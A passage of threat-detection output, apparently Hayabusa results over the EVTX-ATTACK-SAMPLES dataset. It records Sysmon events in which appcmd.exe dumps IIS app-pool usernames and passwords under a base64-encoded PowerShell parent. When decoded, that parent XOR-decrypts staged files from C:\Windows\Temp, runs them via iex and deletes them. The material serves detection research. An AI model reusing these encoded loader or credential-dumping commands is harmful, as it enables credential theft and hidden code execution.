ZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:17.661 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool ""Filename: redirection.config"" /text:processmodel.username : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:17.731 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool ""Filename: redirection.config"" /text:processmodel.password : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:17.811 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool /text:processmodel.username : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:17.891 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool /text:processmodel.password : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:17.971 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool ""Line Number: 0"" /text:processmodel.username : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:18.041 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool ""Line Number: 0"" /text:processmodel.password : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: 